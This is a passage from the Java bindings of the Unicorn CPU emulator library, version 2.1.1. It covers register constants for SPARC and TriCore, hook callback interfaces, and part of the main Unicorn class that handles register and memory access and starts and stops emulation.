= 6; public static final int UC_SPARC_REG_F6 = 7; public static final int UC_SPARC_REG_F7 = 8; public static final int UC_SPARC_REG_F8 = 9; public static final int UC_SPARC_REG_F9 = 10; public static final int UC_SPARC_REG_F10 = 11; public static final int UC_SPARC_REG_F11 = 12; public static final int UC_SPARC_REG_F12 = 13; public static final int UC_SPARC_REG_F13 = 14; public static final int UC_SPARC_REG_F14 = 15; public static final int UC_SPARC_REG_F15 = 16; public static final int UC_SPARC_REG_F16 = 17; public static final int UC_SPARC_REG_F17 = 18; public static final int UC_SPARC_REG_F18 = 19; public static final int UC_SPARC_REG_F19 = 20; public static final int UC_SPARC_REG_F20 = 21; public static final int UC_SPARC_REG_F21 = 22; public static final int UC_SPARC_REG_F22 = 23; public static final int UC_SPARC_REG_F23 = 24; public static final int UC_SPARC_REG_F24 = 25; public static final int UC_SPARC_REG_F25 = 26; public static final int UC_SPARC_REG_F26 = 27; public static final int UC_SPARC_REG_F27 = 28; public static final int UC_SPARC_REG_F28 = 29; public static final int UC_SPARC_REG_F29 = 30; public static final int UC_SPARC_REG_F30 = 31; public static final int UC_SPARC_REG_F31 = 32; public static final int UC_SPARC_REG_F32 = 33; public static final int UC_SPARC_REG_F34 = 34; public static final int UC_SPARC_REG_F36 = 35; public static final int UC_SPARC_REG_F38 = 36; public static final int UC_SPARC_REG_F40 = 37; public static final int UC_SPARC_REG_F42 = 38; public static final int UC_SPARC_REG_F44 = 39; public static final int UC_SPARC_REG_F46 = 40; public static final int UC_SPARC_REG_F48 = 41; public static final int UC_SPARC_REG_F50 = 42; public static final int UC_SPARC_REG_F52 = 43; public static final int UC_SPARC_REG_F54 = 44; public static final int UC_SPARC_REG_F56 = 45; public static final int UC_SPARC_REG_F58 = 46; public static final int UC_SPARC_REG_F60 = 47; public static final int UC_SPARC_REG_F62 = 48; public static final int UC_SPARC_REG_FCC0 = 49; public static final int UC_SPARC_REG_FCC1 = 50; public static final int UC_SPARC_REG_FCC2 = 51; public static final int UC_SPARC_REG_FCC3 = 52; public static final int UC_SPARC_REG_G0 = 53; public static final int UC_SPARC_REG_G1 = 54; public static final int UC_SPARC_REG_G2 = 55; public static final int UC_SPARC_REG_G3 = 56; public static final int UC_SPARC_REG_G4 = 57; public static final int UC_SPARC_REG_G5 = 58; public static final int UC_SPARC_REG_G6 = 59; public static final int UC_SPARC_REG_G7 = 60; public static final int UC_SPARC_REG_I0 = 61; public static final int UC_SPARC_REG_I1 = 62; public static final int UC_SPARC_REG_I2 = 63; public static final int UC_SPARC_REG_I3 = 64; public static final int UC_SPARC_REG_I4 = 65; public static final int UC_SPARC_REG_I5 = 66; public static final int UC_SPARC_REG_FP = 67; public static final int UC_SPARC_REG_I7 = 68; public static final int UC_SPARC_REG_ICC = 69; public static final int UC_SPARC_REG_L0 = 70; public static final int UC_SPARC_REG_L1 = 71; public static final int UC_SPARC_REG_L2 = 72; public static final int UC_SPARC_REG_L3 = 73; public static final int UC_SPARC_REG_L4 = 74; public static final int UC_SPARC_REG_L5 = 75; public static final int UC_SPARC_REG_L6 = 76; public static final int UC_SPARC_REG_L7 = 77; public static final int UC_SPARC_REG_O0 = 78; public static final int UC_SPARC_REG_O1 = 79; public static final int UC_SPARC_REG_O2 = 80; public static final int UC_SPARC_REG_O3 = 81; public static final int UC_SPARC_REG_O4 = 82; public static final int UC_SPARC_REG_O5 = 83; public static final int UC_SPARC_REG_SP = 84; public static final int UC_SPARC_REG_O7 = 85; public static final int UC_SPARC_REG_Y = 86; public static final int UC_SPARC_REG_XCC = 87; public static final int UC_SPARC_REG_PC = 88; public static final int UC_SPARC_REG_ENDING = 89; public static final int UC_SPARC_REG_O6 = 84; public static final int UC_SPARC_REG_I6 = 67; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/SyscallHook.java000066400000000000000000000021741467524106700251350ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_INSN} with {@code UC_X86_INS_SYSCALL} or * {@code UC_X86_INS_SYSENTER} */ public interface SyscallHook extends InstructionHook { /** Called to handle an x86 SYSCALL or SYSENTER instruction. * * @param u {@link Unicorn} instance firing this hook * @param user user data provided when registering this hook */ public void hook(Unicorn u, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/TcgOpcodeHook.java000066400000000000000000000030121467524106700253620ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_TCG_OPCODE} */ public interface TcgOpcodeHook extends Hook { /** Called on every instruction of the registered type(s) within the * registered range. For example, a {@code UC_TCG_OP_SUB} hook fires on * every instruction that contains a subtraction operation, unless * otherwise filtered. * * @param u {@link Unicorn} instance firing this hook * @param address address of the instruction * @param arg1 first argument to the instruction * @param arg2 second argument to the instruction * @param size size of the operands (currently, 32 or 64) * @param user user data provided when registering this hook */ public void hook(Unicorn u, long address, long arg1, long arg2, int size, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/TlbFillHook.java000066400000000000000000000034061467524106700250520ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** Callback for {@code UC_HOOK_TLB_FILL} */ public interface TlbFillHook extends Hook { /** Called to map a virtual address within the registered range to a * physical address. The resulting mapping is cached in the QEMU TLB. * These hooks are only called if the TLB mode (set via * {@link Unicorn#ctl_tlb_mode}) is set to {@code UC_TLB_VIRTUAL}. * * @param u {@link Unicorn} instance firing this hook * @param vaddr virtual address being mapped * @param type type of memory access ({@code UC_MEM_READ}, * {@code UC_MEM_WRITE} or {@code UC_MEM_FETCH}). * @param user user data provided when registering this hook * @return the page-aligned physical address ORed with the page * protection bits ({@code UC_PROT_*}). Return -1L to * indicate an unmapped address; if all hooks return -1L, * the memory access will fail and raise a CPU exception. */ public long hook(Unicorn u, long vaddr, int type, Object user); } unicorn-2.1.1/bindings/java/src/main/java/unicorn/TranslationBlock.java000066400000000000000000000021701467524106700261470ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; /** uc_tb */ public class TranslationBlock { public long pc; public int icount; public int size; public TranslationBlock(long pc, int icount, int size) { this.pc = pc; this.icount = icount; this.size = size; } @Override public String toString() { return String.format("TranslationBlock [pc=0x%x, icount=%d, size=%d]", pc, icount, size); } } unicorn-2.1.1/bindings/java/src/main/java/unicorn/TriCoreConst.java000066400000000000000000000145621467524106700252640ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface TriCoreConst { // TRICORE CPU public static final int UC_CPU_TRICORE_TC1796 = 0; public static final int UC_CPU_TRICORE_TC1797 = 1; public static final int UC_CPU_TRICORE_TC27X = 2; public static final int UC_CPU_TRICORE_ENDING = 3; // TRICORE registers public static final int UC_TRICORE_REG_INVALID = 0; public static final int UC_TRICORE_REG_A0 = 1; public static final int UC_TRICORE_REG_A1 = 2; public static final int UC_TRICORE_REG_A2 = 3; public static final int UC_TRICORE_REG_A3 = 4; public static final int UC_TRICORE_REG_A4 = 5; public static final int UC_TRICORE_REG_A5 = 6; public static final int UC_TRICORE_REG_A6 = 7; public static final int UC_TRICORE_REG_A7 = 8; public static final int UC_TRICORE_REG_A8 = 9; public static final int UC_TRICORE_REG_A9 = 10; public static final int UC_TRICORE_REG_A10 = 11; public static final int UC_TRICORE_REG_A11 = 12; public static final int UC_TRICORE_REG_A12 = 13; public static final int UC_TRICORE_REG_A13 = 14; public static final int UC_TRICORE_REG_A14 = 15; public static final int UC_TRICORE_REG_A15 = 16; public static final int UC_TRICORE_REG_D0 = 17; public static final int UC_TRICORE_REG_D1 = 18; public static final int UC_TRICORE_REG_D2 = 19; public static final int UC_TRICORE_REG_D3 = 20; public static final int UC_TRICORE_REG_D4 = 21; public static final int UC_TRICORE_REG_D5 = 22; public static final int UC_TRICORE_REG_D6 = 23; public static final int UC_TRICORE_REG_D7 = 24; public static final int UC_TRICORE_REG_D8 = 25; public static final int UC_TRICORE_REG_D9 = 26; public static final int UC_TRICORE_REG_D10 = 27; public static final int UC_TRICORE_REG_D11 = 28; public static final int UC_TRICORE_REG_D12 = 29; public static final int UC_TRICORE_REG_D13 = 30; public static final int UC_TRICORE_REG_D14 = 31; public static final int UC_TRICORE_REG_D15 = 32; public static final int UC_TRICORE_REG_PCXI = 33; public static final int UC_TRICORE_REG_PSW = 34; public static final int UC_TRICORE_REG_PSW_USB_C = 35; public static final int UC_TRICORE_REG_PSW_USB_V = 36; public static final int UC_TRICORE_REG_PSW_USB_SV = 37; public static final int UC_TRICORE_REG_PSW_USB_AV = 38; public static final int UC_TRICORE_REG_PSW_USB_SAV = 39; public static final int UC_TRICORE_REG_PC = 40; public static final int UC_TRICORE_REG_SYSCON = 41; public static final int UC_TRICORE_REG_CPU_ID = 42; public static final int UC_TRICORE_REG_BIV = 43; public static final int UC_TRICORE_REG_BTV = 44; public static final int UC_TRICORE_REG_ISP = 45; public static final int UC_TRICORE_REG_ICR = 46; public static final int UC_TRICORE_REG_FCX = 47; public static final int UC_TRICORE_REG_LCX = 48; public static final int UC_TRICORE_REG_COMPAT = 49; public static final int UC_TRICORE_REG_DPR0_U = 50; public static final int UC_TRICORE_REG_DPR1_U = 51; public static final int UC_TRICORE_REG_DPR2_U = 52; public static final int UC_TRICORE_REG_DPR3_U = 53; public static final int UC_TRICORE_REG_DPR0_L = 54; public static final int UC_TRICORE_REG_DPR1_L = 55; public static final int UC_TRICORE_REG_DPR2_L = 56; public static final int UC_TRICORE_REG_DPR3_L = 57; public static final int UC_TRICORE_REG_CPR0_U = 58; public static final int UC_TRICORE_REG_CPR1_U = 59; public static final int UC_TRICORE_REG_CPR2_U = 60; public static final int UC_TRICORE_REG_CPR3_U = 61; public static final int UC_TRICORE_REG_CPR0_L = 62; public static final int UC_TRICORE_REG_CPR1_L = 63; public static final int UC_TRICORE_REG_CPR2_L = 64; public static final int UC_TRICORE_REG_CPR3_L = 65; public static final int UC_TRICORE_REG_DPM0 = 66; public static final int UC_TRICORE_REG_DPM1 = 67; public static final int UC_TRICORE_REG_DPM2 = 68; public static final int UC_TRICORE_REG_DPM3 = 69; public static final int UC_TRICORE_REG_CPM0 = 70; public static final int UC_TRICORE_REG_CPM1 = 71; public static final int UC_TRICORE_REG_CPM2 = 72; public static final int UC_TRICORE_REG_CPM3 = 73; public static final int UC_TRICORE_REG_MMU_CON = 74; public static final int UC_TRICORE_REG_MMU_ASI = 75; public static final int UC_TRICORE_REG_MMU_TVA = 76; public static final int UC_TRICORE_REG_MMU_TPA = 77; public static final int UC_TRICORE_REG_MMU_TPX = 78; public static final int UC_TRICORE_REG_MMU_TFA = 79; public static final int UC_TRICORE_REG_BMACON = 80; public static final int UC_TRICORE_REG_SMACON = 81; public static final int UC_TRICORE_REG_DIEAR = 82; public static final int UC_TRICORE_REG_DIETR = 83; public static final int UC_TRICORE_REG_CCDIER = 84; public static final int UC_TRICORE_REG_MIECON = 85; public static final int UC_TRICORE_REG_PIEAR = 86; public static final int UC_TRICORE_REG_PIETR = 87; public static final int UC_TRICORE_REG_CCPIER = 88; public static final int UC_TRICORE_REG_DBGSR = 89; public static final int UC_TRICORE_REG_EXEVT = 90; public static final int UC_TRICORE_REG_CREVT = 91; public static final int UC_TRICORE_REG_SWEVT = 92; public static final int UC_TRICORE_REG_TR0EVT = 93; public static final int UC_TRICORE_REG_TR1EVT = 94; public static final int UC_TRICORE_REG_DMS = 95; public static final int UC_TRICORE_REG_DCX = 96; public static final int UC_TRICORE_REG_DBGTCR = 97; public static final int UC_TRICORE_REG_CCTRL = 98; public static final int UC_TRICORE_REG_CCNT = 99; public static final int UC_TRICORE_REG_ICNT = 100; public static final int UC_TRICORE_REG_M1CNT = 101; public static final int UC_TRICORE_REG_M2CNT = 102; public static final int UC_TRICORE_REG_M3CNT = 103; public static final int UC_TRICORE_REG_ENDING = 104; public static final int UC_TRICORE_REG_GA0 = 1; public static final int UC_TRICORE_REG_GA1 = 2; public static final int UC_TRICORE_REG_GA8 = 9; public static final int UC_TRICORE_REG_GA9 = 10; public static final int UC_TRICORE_REG_SP = 11; public static final int UC_TRICORE_REG_LR = 12; public static final int UC_TRICORE_REG_IA = 16; public static final int UC_TRICORE_REG_ID = 32; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/Unicorn.java000066400000000000000000001552561467524106700243310ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle, 2023 Robert Xiao This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; import java.math.BigInteger; import java.nio.Buffer; import java.nio.ByteBuffer; import java.nio.ByteOrder; import java.util.Arrays; import java.util.Hashtable; import java.util.Iterator; import java.util.Map; import java.util.concurrent.atomic.AtomicLong; /** Unicorn is a lightweight multi-platform, multi-architecture CPU emulator framework. */ public class Unicorn implements UnicornConst, Arm64Const, ArmConst, M68kConst, MipsConst, PpcConst, RiscvConst, S390xConst, SparcConst, TriCoreConst, X86Const { private long nativePtr; private int arch; private int mode; private Hashtable hooks = new Hashtable<>(); /** Instead of handing out native pointers, we'll hand out a handle * ID for safety. This prevents things like "double frees" - * accidentally releasing an unrelated object via handle reuse. */ private static AtomicLong allocCounter = new AtomicLong(0x1000); private static long nextAllocCounter() { return allocCounter.addAndGet(8); } /** Wrapper around a registered hook */ private static class HookWrapper { Hook hook; long nativePtr; @Override protected void finalize() { _hookwrapper_free(nativePtr); } } public static class Context { long nativePtr; public int arch; public int mode; @Override protected void finalize() { _context_free(nativePtr); } /** * Read register value from saved context. * * @param regid Register ID that is to be retrieved. This function only supports * integer registers at most 64 bits long. * @return value of the register. * @see Unicorn#reg_read(int) */ public long reg_read(int regid) throws UnicornException { return do_reg_read_long(nativePtr, 1, arch, regid); } /** * Read register value from saved context. * * @param regid Register ID that is to be retrieved. * @param opt Options for this register, or null if no options are required. * @return value of the register - Long, BigInteger, or structure. * @see Unicorn#reg_read(int, Object) */ public Object reg_read(int regid, Object opt) throws UnicornException { return do_reg_read_obj(nativePtr, 1, arch, regid, opt); } /** * Write to register in saved context. * * @param regid Register ID that is to be modified. * @param value Object containing the new register value. * @see Unicorn#reg_write(int, long) */ public void reg_write(int regid, long value) throws UnicornException { do_reg_write_long(nativePtr, 1, arch, regid, value); } /** * Write to register in saved context. * * @param regid Register ID that is to be modified. * @param value Object containing the new register value. * @see Unicorn#reg_write(int, Object) */ public void reg_write(int regid, Object value) throws UnicornException { do_reg_write_obj(nativePtr, 1, arch, regid, value); } } static { // load libunicorn_java.{so,dylib} or unicorn_java.dll System.loadLibrary("unicorn_java"); } /** * Create a new Unicorn object * * @param arch Architecture type. One of the {@code UC_ARCH_*} constants. * @param mode Hardware mode. Bitwise combination of {@code UC_MODE_*} constants. * @see UnicornConst * */ public Unicorn(int arch, int mode) throws UnicornException { // remember these in case we need arch specific code this.arch = arch; this.mode = mode; nativePtr = _open(arch, mode); } /** * Close the C {@code uc_engine} associated with this Unicorn object, * freeing all associated resources. After calling this method, the * API will no longer be usable. */ public void close() throws UnicornException { if (nativePtr != 0) { _close(nativePtr); nativePtr = 0; } } /** * Automatically close the {@code uc_engine} upon GC finalization. */ @Override protected void finalize() { close(); } /** * Return combined API version & major and minor version numbers. * * @return version number as {@code (major << 24 | minor << 16 | * patch << 8 | extra)}. * For example, Unicorn version 2.0.1 final would be 0x020001ff. */ public static int version() { return _version(); } /** * Determine if the given architecture is supported by this library. * * @param arch Architecture type ({@code UC_ARCH_*} constant) * @return {@code true} if this library supports the given arch. * @see UnicornConst */ public static boolean arch_supported(int arch) { return _arch_supported(arch); } /** * Emulate machine code for a specific length of time or number of * instructions. * * @param begin Address where emulation starts * @param until Address where emulation stops (i.e. when this address is hit) * @param timeout Duration to emulate the code for, in microseconds, or 0 to * run indefinitely. * @param count The maximum number of instructions to execute, or 0 to * execute indefinitely. * @throws UnicornException if an unhandled CPU exception or other error * occurs during emulation. */ public void emu_start(long begin, long until, long timeout, long count) throws UnicornException { _emu_start(nativePtr, begin, until, timeout, count); } /** * Stop emulation (which was started by {@link #emu_start()}). * * This can be called from hook callbacks or from a separate thread. * NOTE: for now, this will stop the execution only after the current * basic block. */ public void emu_stop() throws UnicornException { _emu_stop(nativePtr); } private static boolean is_long_register(int arch, int regid) { switch (arch) { case UC_ARCH_X86: return !(regid == UC_X86_REG_IDTR || regid == UC_X86_REG_GDTR || regid == UC_X86_REG_LDTR || regid == UC_X86_REG_TR || (regid >= UC_X86_REG_FP0 && regid <= UC_X86_REG_FP7) || (regid >= UC_X86_REG_ST0 && regid <= UC_X86_REG_ST7) || (regid >= UC_X86_REG_XMM0 && regid <= UC_X86_REG_XMM31) || (regid >= UC_X86_REG_YMM0 && regid <= UC_X86_REG_YMM31) || (regid >= UC_X86_REG_ZMM0 && regid <= UC_X86_REG_ZMM31) || regid == UC_X86_REG_MSR); case UC_ARCH_ARM: return !(regid == UC_ARM_REG_CP_REG); case UC_ARCH_ARM64: return !(regid == UC_ARM64_REG_CP_REG || (regid >= UC_ARM64_REG_Q0 && regid <= UC_ARM64_REG_Q31) || (regid >= UC_ARM64_REG_V0 && regid <= UC_ARM64_REG_V31)); } return true; } private static long do_reg_read_long(long ptr, int isContext, int arch, int regid) throws UnicornException { if (is_long_register(arch, regid)) { return _reg_read_long(ptr, isContext, regid); } else { throw new UnicornException("Invalid register for reg_read_long"); } } private static Object do_reg_read_obj(long ptr, int isContext, int arch, int regid, Object opt) throws UnicornException { switch (arch) { case UC_ARCH_X86: if (regid == UC_X86_REG_IDTR || regid == UC_X86_REG_GDTR || regid == UC_X86_REG_LDTR || regid == UC_X86_REG_TR) { return _reg_read_x86_mmr(ptr, isContext, regid); } else if ((regid >= UC_X86_REG_FP0 && regid <= UC_X86_REG_FP7) || (regid >= UC_X86_REG_ST0 && regid <= UC_X86_REG_ST7)) { ByteBuffer b = ByteBuffer.allocate(16).order(ByteOrder.LITTLE_ENDIAN); _reg_read_bytes(ptr, isContext, regid, b.array()); return new X86_Float80(b.getLong(0), b.getShort(8)); } else if (regid >= UC_X86_REG_XMM0 && regid <= UC_X86_REG_XMM31) { return do_reg_read_bigint(ptr, isContext, regid, 128); } else if (regid >= UC_X86_REG_YMM0 && regid <= UC_X86_REG_YMM31) { return do_reg_read_bigint(ptr, isContext, regid, 256); } else if (regid >= UC_X86_REG_ZMM0 && regid <= UC_X86_REG_ZMM31) { return do_reg_read_bigint(ptr, isContext, regid, 512); } else if (regid == UC_X86_REG_MSR) { X86_MSR reg = (X86_MSR) opt; return (Long) _reg_read_x86_msr(ptr, isContext, reg.rid); } break; case UC_ARCH_ARM: if (regid == UC_ARM_REG_CP_REG) { Arm_CP reg = (Arm_CP) opt; return (Long) _reg_read_arm_cp(ptr, isContext, reg.cp, reg.is64, reg.sec, reg.crn, reg.crm, reg.opc1, reg.opc2); } break; case UC_ARCH_ARM64: if (regid == UC_ARM64_REG_CP_REG) { Arm64_CP reg = (Arm64_CP) opt; return (Long) _reg_read_arm64_cp(ptr, isContext, reg.crn, reg.crm, reg.op0, reg.op1, reg.op2); } else if ((regid >= UC_ARM64_REG_Q0 && regid <= UC_ARM64_REG_Q31) || (regid >= UC_ARM64_REG_V0 && regid <= UC_ARM64_REG_V31)) { return do_reg_read_bigint(ptr, isContext, regid, 128); } break; } return _reg_read_long(ptr, isContext, regid); } private static void do_reg_write_long(long ptr, int isContext, int arch, int regid, long value) throws UnicornException { if (is_long_register(arch, regid)) { _reg_write_long(ptr, isContext, regid, value); } else { throw new UnicornException("Invalid register for reg_read_long"); } } private static void do_reg_write_obj(long ptr, int isContext, int arch, int regid, Object value) throws UnicornException { switch (arch) { case UC_ARCH_X86: if (regid == UC_X86_REG_IDTR || regid == UC_X86_REG_GDTR || regid == UC_X86_REG_LDTR || regid == UC_X86_REG_TR) { X86_MMR reg = (X86_MMR) value; _reg_write_x86_mmr(ptr, isContext, regid, reg.selector, reg.base, reg.limit, reg.flags); return; } else if ((regid >= UC_X86_REG_FP0 && regid <= UC_X86_REG_FP7) || (regid >= UC_X86_REG_ST0 && regid <= UC_X86_REG_ST7)) { X86_Float80 reg = (X86_Float80) value; ByteBuffer b = ByteBuffer.allocate(16).order(ByteOrder.LITTLE_ENDIAN); b.putLong(0, reg.mantissa); b.putShort(8, reg.exponent); _reg_write_bytes(ptr, isContext, regid, b.array()); return; } else if (regid >= UC_X86_REG_XMM0 && regid <= UC_X86_REG_XMM31) { do_reg_write_bigint(ptr, isContext, regid, (BigInteger) value, 128); return; } else if (regid >= UC_X86_REG_YMM0 && regid <= UC_X86_REG_YMM31) { do_reg_write_bigint(ptr, isContext, regid, (BigInteger) value, 256); return; } else if (regid >= UC_X86_REG_ZMM0 && regid <= UC_X86_REG_ZMM31) { do_reg_write_bigint(ptr, isContext, regid, (BigInteger) value, 512); return; } else if (regid == UC_X86_REG_MSR) { X86_MSR reg = (X86_MSR) value; _reg_write_x86_msr(ptr, isContext, reg.rid, reg.value); return; } break; case UC_ARCH_ARM: if (regid == UC_ARM_REG_CP_REG) { Arm_CP reg = (Arm_CP) value; _reg_write_arm_cp(ptr, isContext, reg.cp, reg.is64, reg.sec, reg.crn, reg.crm, reg.opc1, reg.opc2, reg.val); return; } break; case UC_ARCH_ARM64: if (regid == UC_ARM64_REG_CP_REG) { Arm64_CP reg = (Arm64_CP) value; _reg_write_arm64_cp(ptr, isContext, reg.crn, reg.crm, reg.op0, reg.op1, reg.op2, reg.val); return; } else if ((regid >= UC_ARM64_REG_Q0 && regid <= UC_ARM64_REG_Q31) || (regid >= UC_ARM64_REG_V0 && regid <= UC_ARM64_REG_V31)) { do_reg_write_bigint(ptr, isContext, regid, (BigInteger) value, 128); return; } break; } _reg_write_long(ptr, isContext, regid, (Long) value); } private static BigInteger do_reg_read_bigint(long ptr, int isContext, int regid, int nbits) { byte[] buf = new byte[nbits >> 3]; _reg_read_bytes(ptr, isContext, regid, buf); if (ByteOrder.nativeOrder().equals(ByteOrder.LITTLE_ENDIAN)) { // reverse native buffer to big-endian on little-endian hosts int i = buf.length - 1; int j = 0; while (i > j) { byte temp = buf[i]; buf[i] = buf[j]; buf[j] = temp; i--; j++; } } return new BigInteger(1, buf); } private static void do_reg_write_bigint(long ptr, int isContext, int regid, BigInteger value, int nbits) { byte[] val = value.toByteArray(); byte[] buf = new byte[nbits >> 3]; if (val.length == ((nbits >> 3) + 1) && val[0] == 0x00) { // unsigned value >= 2^(nbits - 1): has a zero sign bit val = Arrays.copyOfRange(val, 1, val.length); } else if (val[0] < 0) { Arrays.fill(buf, (byte) 0xff); } if (val.length > (nbits >> 3)) { throw new IllegalArgumentException( "input integer is too large for a " + nbits + "-bit register (got " + (value.bitLength() + 1) + " bits)"); } if (ByteOrder.nativeOrder().equals(ByteOrder.LITTLE_ENDIAN)) { for (int i = 0; i < val.length; i++) { buf[i] = val[val.length - i - 1]; } } else { System.arraycopy(val, 0, buf, buf.length - val.length, val.length); } _reg_write_bytes(ptr, isContext, regid, buf); } /** * Read register value of at most 64 bits in size. * * @param regid Register ID that is to be retrieved. This function only supports * integer registers at most 64 bits long. * @return value of the register. * @see {@link #reg_read(int, Object)} to read larger registers or * registers requiring configuration. * @throws UnicornException if the register is not valid for the current * architecture or mode. */ public long reg_read(int regid) throws UnicornException { return do_reg_read_long(nativePtr, 0, arch, regid); } /** * Read register value. The return type depends on {@code regid} as * follows. {@code opt} should be {@code null} unless otherwise specified. *
    *
  • {@code UC_X86_REG_*TR} => {@link X86_MMR} *
  • {@code UC_X86_REG_FP*} => {@link X86_Float80} *
  • {@code UC_X86_REG_ST*} => {@link X86_Float80} *
  • {@code UC_X86_REG_XMM*} => {@link BigInteger} (128 bits) *
  • {@code UC_X86_REG_YMM*} => {@link BigInteger} (256 bits) *
  • {@code UC_X86_REG_ZMM*} => {@link BigInteger} (512 bits) *
  • {@code UC_X86_REG_MSR} (opt: {@link X86_MSR}) => {@link Long} *
  • {@code UC_ARM_REG_CP} (opt: {@link Arm_CP}) => {@link Long} *
  • {@code UC_ARM64_REG_CP} (opt: {@link Arm64_CP}) => {@link Long} *
  • {@code UC_ARM64_REG_Q*} => {@link BigInteger} (128 bits) *
  • {@code UC_ARM64_REG_V*} => {@link BigInteger} (128 bits) *
* * {@link BigInteger} registers always produce non-negative results (i.e. * they read as unsigned integers). * * @param regid Register ID that is to be retrieved. * @param opt Options for this register, or {@code null} if no options * are required. * @return value of the register - {@link Long}, {@link BigInteger}, * or other class. * @throws UnicornException if the register is not valid for the current * architecture or mode. */ public Object reg_read(int regid, Object opt) throws UnicornException { return do_reg_read_obj(nativePtr, 0, arch, regid, opt); } /** * Write to register. This sets any register that doesn't require special * options and which is at most 64 bits long. * * @param regid Register ID that is to be modified. * @param value Object containing the new register value. * @see {@link #reg_read(int, Object)} to write larger registers or * registers requiring configuration. * @throws UnicornException if the register is not valid for the current * architecture or mode. */ public void reg_write(int regid, long value) throws UnicornException { do_reg_write_long(nativePtr, 0, arch, regid, value); } /** * Write to register. The type of {@code value} depends on {@code regid}: *
    *
  • {@code UC_X86_REG_*TR} => {@link X86_MMR} *
  • {@code UC_X86_REG_FP*} => {@link X86_Float80} *
  • {@code UC_X86_REG_ST*} => {@link X86_Float80} *
  • {@code UC_X86_REG_XMM*} => {@link BigInteger} (128 bits) *
  • {@code UC_X86_REG_YMM*} => {@link BigInteger} (256 bits) *
  • {@code UC_X86_REG_ZMM*} => {@link BigInteger} (512 bits) *
  • {@code UC_X86_REG_MSR} => {@link X86_MSR} *
  • {@code UC_ARM_REG_CP} => {@link Arm_CP} *
  • {@code UC_ARM64_REG_CP} => {@link Arm64_CP} *
  • {@code UC_ARM64_REG_Q*} => {@link BigInteger} (128 bits) *
  • {@code UC_ARM64_REG_V*} => {@link BigInteger} (128 bits) *
* * {@link BigInteger} values can be signed or unsigned, as long as the * value fits in the target register size. Values that are too large will * be rejected. * * @param regid Register ID that is to be modified. * @param value Object containing the new register value. * @throws UnicornException if the register is not valid for the current * architecture or mode. */ public void reg_write(int regid, Object value) throws UnicornException { do_reg_write_obj(nativePtr, 0, arch, regid, value); } /** @deprecated Use individual calls to {@code reg_read} instead. * This method is deprecated as it is much slower than * {@link #reg_read(int)} for reading 64-bit-or-smaller registers. */ @Deprecated public Object[] reg_read_batch(int regids[]) throws UnicornException { Object[] res = new Object[regids.length]; for (int i = 0; i < regids.length; i++) { res[i] = reg_read(regids[i], null); } return res; } /** @deprecated Use individual calls to {@code reg_write} instead. * This method is deprecated as it is much slower than * {@link #reg_write(int, long)} for writing 64-bit-or-smaller registers. */ @Deprecated public void reg_write_batch(int regids[], Object vals[]) throws UnicornException { if (regids.length != vals.length) { throw new UnicornException(strerror(UC_ERR_ARG)); } for (int i = 0; i < regids.length; i++) { reg_write(regids[i], vals[i]); } } /** * Read from memory. * * @param address Start address of the memory region to be read. * @param size Number of bytes to be retrieved. * @return Byte array containing the contents of the requested memory range. */ public byte[] mem_read(long address, int size) throws UnicornException { byte[] result = new byte[size]; _mem_read(nativePtr, address, result); return result; } /** @deprecated Use {@link #mem_read(long, int)} instead. */ @Deprecated public byte[] mem_read(long address, long size) throws UnicornException { if (size < 0) { throw new NegativeArraySizeException("size cannot be negative"); } else if (size > Integer.MAX_VALUE) { throw new IllegalArgumentException("size must fit in an int"); } byte[] result = new byte[(int) size]; _mem_read(nativePtr, address, result); return result; } /** * Write to memory. * * @param address Start address of the memory region to be written. * @param bytes The values to be written into memory. {@code bytes.length} * bytes will be written. */ public void mem_write(long address, byte[] bytes) throws 